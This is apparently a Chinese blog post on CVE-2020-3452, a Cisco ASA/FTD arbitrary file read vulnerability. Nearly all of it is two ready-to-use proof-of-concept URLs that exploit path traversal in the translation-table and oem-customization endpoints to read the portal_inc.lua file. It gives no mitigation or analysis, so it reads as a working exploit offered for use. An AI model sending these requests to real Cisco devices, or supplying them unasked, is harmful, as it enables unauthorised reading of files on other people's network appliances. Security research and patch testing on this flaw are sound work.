CVE-2020-3452:Cisco_ASAFTD任意文件读取漏洞

CVE-2020-3452:Cisco_ASAFTD任意文件读取漏洞

POC:one:

“`
For example to read “/+CSCOE+/portal_inc.lua” file. https:///+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
“`

POC:two:

“`
https:///+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容